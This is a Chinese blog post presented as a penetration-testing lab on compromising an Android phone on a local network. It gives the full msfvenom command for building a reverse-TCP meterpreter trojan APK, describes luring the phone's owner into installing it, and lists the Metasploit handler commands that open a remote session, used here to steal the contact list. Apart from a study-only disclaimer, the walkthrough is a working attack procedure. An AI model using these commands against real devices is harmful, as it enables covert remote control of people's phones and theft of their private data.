• 渗透测试--使用kali入侵局域网手机实验


    声明本文仅限于技术讨论与学习,严禁用于非法途径,否则后果自负。

    原理:借助kali的Metasploit渗透测试框架生成远程木马,然后感染局域网内Android手机,从而实现对被渗透手机数据的读取等。

    实验前准备

        kali虚拟机:192.168.0.102(攻击机)

        win10中间机:用于将kali生成的远程木马发送到Android手机中。

        Android手机:192.168.0.105(靶机)

        Xshell4:用于将在kali上生成的远程木马从kali中导到win10中间机中。

    实验过程

    一、kali生成远程木马

      1.利用msfvenom生成木马病毒,payload选择android/meterpreter/reverse_tcp,后接kali虚拟机的名字和端口:

        msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.102 LPORT=8888 R > /root/android.apk

          

      2. 检查文件的生成:

          

    二、木马传送

      利用win10中的Xshell4将kali中生成的android.apk传送到指定路径(本实验指定路径为F:),再诱导Android手机(靶机)安装。

      1.用Xshell4连接kali虚拟机并将android.apk传送到指定路径:

           

           

           

       2.将F盘下的android.apk诱导发送到目标靶机上安装。

        目标靶机上安装完成木马后会出现如下图标:

          

     三、目标攻击

      1.msf监听

        kali虚拟机终端依次执行以下命令:

          msfconsole        //启动msfconsole

          use exploit/multi/handler  //加载模块

          set payload android/meterpreter/reverse_tcp  //选择payload

          set LHOST 192.168.0.102

          set LPORT 8888

          exploit          //开始执行漏洞,开始监听,等待目标上线 

        

       在目标手机上点一下木马文件(没有页面),则可成功建立攻击会话:

        

       查看上述文件:

    上述实验演示的是窃取目标靶机通讯录,如果对其他命令感兴趣的话可通过help命令自行尝试。

    提醒本实验仅用于技术讨论与学习,严禁用于非法途径,否则后果自负。

  • 相关阅读:
    六 Vue学习 首页 (下)
    【Python】xpath中为什么粘贴进去代码后老报错?如何在定位元素的时候准确找到定位切入点?
    【Python】if相关知识点
    【Python】获取翻页之后的各页面中的属性值。
    【Python】如何取到input中的value值?
    【Python】两个for循环嵌套练习
    【Python】自动化测试框架-共通方法汇总
    【Python】Python 打印和输出更多用法。
    【python】Python3 循环语句
    【Python+Selenium】猪猪练习成功版:csv文件的输入和输出(运行环境:python3.5版本)
  • 原文地址:https://www.cnblogs.com/ljwhq/p/13755968.html
Copyright © 2020-2023  润新知